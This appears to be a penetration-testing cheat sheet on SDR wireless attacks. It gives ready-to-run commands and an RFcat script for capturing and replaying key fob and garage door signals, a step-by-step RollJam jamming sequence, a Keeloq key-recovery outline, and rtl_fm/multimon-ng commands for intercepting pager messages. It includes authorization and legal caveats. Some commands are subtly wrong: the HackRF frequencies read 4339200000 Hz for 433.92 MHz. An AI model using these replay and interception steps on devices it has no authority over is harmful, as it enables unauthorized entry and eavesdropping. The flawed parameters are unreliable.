SDR Wireless Attacks
#Overview
Software Defined Radio (SDR) enables pentesters to monitor, analyze, and replay radio signals across a wide range of frequencies. Sub-GHz ISM bands are used by key fobs, garage doors, weather stations, industrial sensors, and IoT devices. These devices often use simple modulation (OOK, ASK, FSK) with no encryption or replay protection, making them vulnerable to capture-replay attacks.
#SDR Hardware
| Device | Frequency Range | Sample Rate | Cost | Best For |
|---|---|---|---|---|
| RTL-SDR v4 | 24 MHz – 1.7 GHz | 2.4 MSPS | $35 | Reception only, learning |
| HackRF One | 1 MHz – 6 GHz | 20 MSPS | $300 | Capture + transmit |
| YardStick One | 300-348, 387-464, 779-928 MHz | 2 MSPS | $100 | Sub-GHz attacks |
| Flipper Zero | 300-348, 387-464, 779-928 MHz | 2 MSPS | $169 | Sub-GHz capture + replay |
| USRP B210 | 70 MHz – 6 GHz | 61.44 MSPS | $1,200 | Professional SDR |
#Attack Decision Tree
Sub-GHz Target Identified?
|
|-- Fixed code (no rolling code)
| |-- Capture and replay directly
| |-- Key fob cloning
| |-- Garage door opening
|
|-- Rolling code (Keeloq, etc.)
| |-- RollJam attack (capture, block, replay)
| |-- Keeloq cryptanalysis
| |-- Manufacturer default codes
|
|-- Unknown protocol
| |-- Frequency identification (RTL-SDR)
| |-- Modulation analysis (SDR waterfall)
| |-- Protocol reverse engineering (Universal Radio Hacker)
|
|-- OOK/ASK modulation
|-- Simple capture + replay
|-- Sub-GHz subcarrier analysis
TEXT
#Step 1: Frequency Identification
# RTL-SDR frequency scanning
# Scan 300-928 MHz for active signals
rtl_power -f 300M:928M:1M -g 40 -i 10 -e 60 scan.csv
# Convert to heatmap with rtl_power
# Install: pip install pyrtlsdr
python3 << 'EOF'
import numpy as np
# Load frequency scan data
data = np.loadtxt('scan.csv', delimiter=',', skiprows=1)
freqs = data[:, 2] # Frequency column
power = data[:, 6] # Power column
# Find peaks (active frequencies)
from scipy.signal import find_peaks
peaks, _ = find_peaks(power, height=-30)
for peak in peaks:
print(f"Active frequency: {freqs[peak]/1e6:.3f} MHz, Power: {power[peak]:.1f} dB")
EOF
# Common frequency bands:
# 315 MHz - Key fobs (Asia, US)
# 390 MHz - Garage doors (US)
# 433.92 MHz - IoT sensors, weather stations (EU, worldwide)
# 868 MHz - Z-Wave (EU)
# 915 MHz - IoT, Z-Wave (US)
BASH
#Step 2: Signal Capture
#RTL-SDR Capture (Reception Only)
# Capture raw I/Q data at 433.92 MHz (common IoT frequency)
rtl_sdr -f 433920000 -s 2048000 -g 40 -n 12000000 capture_433.raw
# Capture with automatic gain
rtl_sdr -f 433920000 -s 2048000 -n 12000000 capture_433.raw
# Stream to file for live analysis
rtl_sdr -f 433920000 -s 2048000 - | sox -t raw -r 2048000 -e signed -b 16 -c 2 - capture_433.wav
BASH
#HackRF Capture (Transmit + Receive)
# Capture at 433.92 MHz
hackrf_transfer -r capture_433.raw -f 4339200000 -s 20000000 -l 32 -g 30
# Transmit captured signal
hackrf_transfer -t capture_433.raw -f 4339200000 -s 20000000 -x 30
# Capture at 315 MHz (key fobs)
hackrf_transfer -r capture_315.raw -f 315000000 -s 20000000 -l 32 -g 30
# Transmit at 315 MHz
hackrf_transfer -t capture_315.raw -f 315000000 -s 20000000 -x 30
BASH
#Flipper Zero Capture
# On Flipper Zero:
# Sub-GHz → Read → 433.92 MHz (or scan frequency)
# Press the button on the key fob while Flipper Zero is reading
# Save the captured signal
# To replay:
# Sub-GHz → Saved → Select signal → Emulate → Press Send
TEXT
#Step 3: Protocol Analysis
#Using Universal Radio Hacker (URH)
# Install URH
pip install urh
# Launch URH
urh
# Workflow:
# 1. File → Open → Load captured .raw or .cap file
# 2. Set center frequency and sample rate
# 3. View signal in time and frequency domain
# 4. Use "Auto-detect modulation" to identify OOK/ASK/FSK
# 5. Use "Demodulate" to extract bits
# 6. Use "Analyze" to identify protocol fields
# 7. Use "Generate" to create modified signals
# 8. Use "Send" to transmit (requires HackRF or compatible SDR)
BASH
#Common Sub-GHz Protocols
| Protocol | Frequency | Modulation | Security |
|---|---|---|---|
| PT2262/2272 | 433.92 MHz | OOK | None (fixed code) |
| EV1527 | 433.92 MHz | OOK | None (fixed code) |
| Keeloq | 433.92 MHz | OOK | Rolling code |
| CAME | 433.92 MHz | OOK | Fixed or rolling |
| Nice FLO | 433.92 MHz | OOK | Rolling code |
| Chamberlain | 315/390 MHz | OOK | Rolling code |
| Texas Instruments | 315 MHz | ASK | Varies |
| Generic IoT | 433.92 MHz | OOK/FSK | Usually none |
#Step 4: Replay Attacks
#Fixed Code Replay (Most IoT Devices)
Fixed-code devices transmit the same code every time a button is pressed. Capturing and replaying the signal opens/closes the device.
# Method 1: HackRF replay
# Capture the signal (see Step 2), then replay:
hackrf_transfer -t capture_433.raw -f 4339200000 -s 20000000 -x 30
# Method 2: YardStick One (sub-GHz only)
# Using RFcat
python3 << 'EOF'
from rflib import *
d = RfCat()
d.setFreq(433920000) # 433.92 MHz
d.setModem(MOD_ASK_OOK)
d.setPktLen(32) # Adjust to captured packet length
d.RFxmit(captured_signal_bytes)
EOF
# Method 3: Flipper Zero
# Sub-GHz → Read → Capture signal → Save → Emulate → Send
BASH
#RollJam Attack (Rolling Code Devices)
Rolling code devices (garage doors, car key fobs) use a counter that increments with each press, preventing simple replay. The RollJam attack captures a code, blocks it from reaching the receiver, then uses it later.
RollJam Attack Sequence:
1. Attacker jams the receiver frequency
2. Victim presses key fob (code A transmitted)
3. Attacker captures code A (blocked from receiver)
4. Attacker transmits code A to jam while capturing the next code
5. Victim presses key fob again (code B transmitted)
6. Attacker captures code B (blocked from receiver)
7. Attacker replays code A → receiver opens (code A is the "next valid" code)
8. Attacker has code B saved for later use
TEXT
# RollJam is a theoretical attack that requires:
# 1. Simultaneous jamming + receiving on adjacent frequencies
# 2. Very precise timing
# 3. Deep knowledge of the specific rolling code protocol
# Tools for RollJam research:
# - HackRF One (dual-channel jam + receive)
# - Custom firmware for simultaneous TX/RX
# - Protocol-specific decoders (Keeloq, Chamberlain, etc.)
# Practical RollJam is extremely difficult and rarely executed
# Most real-world attacks use:
# - Manufacturer default codes
# - KGB/KeeLoq master keys
# - Cloned key fobs (for fixed code systems)
BASH
#Keeloq Cryptanalysis
# Keeloq is used by many garage door and key fob manufacturers
# Cryptanalysis has been demonstrated (Bogdanov 2007, Indesteege 2008)
# Some Keeloq implementations use manufacturer keys that can be extracted:
# - Slide-in encoder: Fixed manufacturer key + device serial
# - Normal encoder: Unique device key derived from manufacturer key
# Keeloq decryption key recovery tools:
# - keeloq_crack (educational)
# - Custom implementations based on published papers
# Practical attack:
# 1. Capture 2^16 (65536) rolling code pairs from the same device
# 2. Use slide attack to recover manufacturer key
# 3. Generate valid rolling codes for any device using that manufacturer key
# This is a research-level attack, not a practical pentest technique
BASH
#Step 5: Key Fob and Garage Door Analysis
#Key Fob Capture
# Capture key fob signals at 315 MHz (US) or 433.92 MHz (EU)
rtl_sdr -f 315000000 -s 2048000 -g 40 -n 2000000 keyfob_315.raw
# Or at 433.92 MHz
rtl_sdr -f 433920000 -s 2048000 -g 40 -n 2000000 keyfob_433.raw
# Analyze in URH:
# 1. Open keyfob_315.raw in URH
# 2. Identify modulation (usually OOK)
# 3. Demodulate to extract bits
# 4. Identify protocol (PT2262, EV1527, Keeloq, etc.)
# 5. Extract fixed code or rolling code
BASH
#Garage Door Analysis
# Common garage door frequencies:
# US: 315 MHz, 390 MHz
# EU: 433.92 MHz, 868 MHz
# Capture garage door remote signal
rtl_sdr -f 390000000 -s 2048000 -g 40 -n 2000000 garage.raw
# Identify the protocol:
# - Chamberlain: Rolling code, 390 MHz
# - LiftMaster: Rolling code, 315/390 MHz
# - CAME: Fixed or rolling, 433.92 MHz
# - Nice FLO: Rolling code, 433.92 MHz
# For fixed code systems, replay directly
# For rolling code systems, see RollJam above
BASH
#Pager / POCSAG Interception
# POCSAG (Post Office Code Standards Advisory Group) pagers
# Operate at 152 MHz, 157 MHz, 454 MHz
# Capture POCSAG pager traffic
rtl_sdr -f 152000000 -s 2048000 -g 40 -n 6000000 pagers.raw
# Decode with multimon-ng
sudo apt install multimon-ng
rtl_fm -f 152.0M -s 22050 -g 40 - | multimon-ng -t raw -a POCSAG512 -a POCSAG1200 -a POCSAG2400 -f alpha -
# POCSAG messages contain:
# - Pager address (RIC)
# - Message type (numeric, alpha, tone)
# - Message content (may contain sensitive information)
BASH
#Regulatory and Safety Considerations
- Transmitting on ISM bands: Legal in most countries for licensed ham radio operators. Unlicensed transmission may violate local regulations.
- Key fob cloning: May be illegal under local laws. Only test on devices you own or have explicit authorization to test.
- Garage doors: Testing may trigger the door or alarm. Inform the property owner.
- Medical devices: NEVER test SDR attacks on medical devices (insulin pumps, pacemakers) without explicit written authorization.
- Automotive key fobs: Many jurisdictions have laws against intercepting and replaying automotive key fob signals.
#Common Pitfalls
- Frequency mismatch: Ensure you're on the correct frequency for your region (US vs EU).
- Sample rate too low: Sub-GHz devices often use low baud rates. Set the SDR sample rate high enough to capture the full signal.
- Antenna mismatch: Use the correct antenna for the frequency (315 MHz antenna for 315 MHz, etc.).
- HackRF TX/RX switching: HackRF cannot transmit and receive simultaneously. Use separate SDRs for RollJam.
- Flipper Zero limitations: The Flipper Zero has limited frequency range and power. It works well for common sub-GHz protocols but can't handle more complex modulation schemes.
#OPSEC Considerations
- SDR transmissions are visible to anyone monitoring the frequency
- Key fob and garage door signals are unencrypted and can be captured by anyone in range
- Replay attacks may trigger alarms or log events on the target device
- Always verify scope explicitly covers SDR and sub-GHz testing
#Cross-References
- Bluetooth Attacks — Another short-range wireless protocol
- Zigbee/Z-Wave Attacks — IoT wireless protocols that use sub-GHz frequencies
- MAC Filtering Bypass — Bypassing MAC filtering on wireless networks
#Tool References
| Tool | Purpose | Link |
|---|---|---|
| RTL-SDR | Low-cost SDR reception | https://www.rtl-sdr.com/ |
| HackRF One | SDR transceiver | https://greatscottgadgets.com/hackrf/ |
| YardStick One | Sub-GHz radio tool | https://greatscottgadgets.com/yardsickone/ |
| Flipper Zero | Multi-protocol sub-GHz tool | https://flipperzero.one/ |
| Universal Radio Hacker | Protocol analysis | https://github.com/jopohl/urh |
| RFcat | Sub-GHz radio control | https://github.com/atlas0fd00m/rfcat |
| multimon-ng | POCSAG/pager decoding | https://github.com/EliasOman/multimon-ng |
| GQRX | SDR receiver GUI | https://gqrx.dk/ |
| SDR# (SDRSharp) | Windows SDR receiver | https://airspy.com/download/ |